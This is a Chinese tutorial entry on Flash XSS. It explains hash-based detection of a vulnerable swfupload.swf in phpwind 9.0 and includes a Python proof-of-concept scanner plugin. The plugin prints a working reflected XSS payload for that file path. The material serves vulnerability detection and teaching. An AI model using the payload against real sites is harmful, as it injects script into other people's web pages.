- Flash XSS
- 实例:
- 实例:
Flash XSS
这一类的 XSS 主要是由于 Flash 与 Js 交互过程中产生的 XSS。
检测方法:校验 flash 的 hash 值(例如: md5)
实例:
phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS漏洞
由于 Flash 文件是可以下载到客户端,所以直接下载该 swf 文件,校验其 hash。根据漏洞详情,可知该 swf 文件路径为: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf
。
范例插件:
PHPWind 9.0 swfupload.swf Flash XSS
感谢插件作者: xyw55
#!/usr/bin/env python
# coding:utf-8
# @Date : 2015-06-28
# @Author : xyw55 (xyw5255@163.com)
'''
phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf xss漏洞 POC
refer : http://wooyun.org/bugs/wooyun-2013-017731
'''
import md5
def assign(service, arg):
if service == fingerprint.phpwind:
return True, arg
def audit(arg):
flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
url = arg
verify_url = url + file_path
code, head, res, redirect_url, log = hackhttp.http(verify_url)
if code == 200:
md5_value = md5.new(res).hexdigest()
if md5_value in flash_md5:
# info 中不要传 log
security_info(url + ' phpwind Reflected XSS; plaload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')
if __name__ == '__main__':
from dummy import *
audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])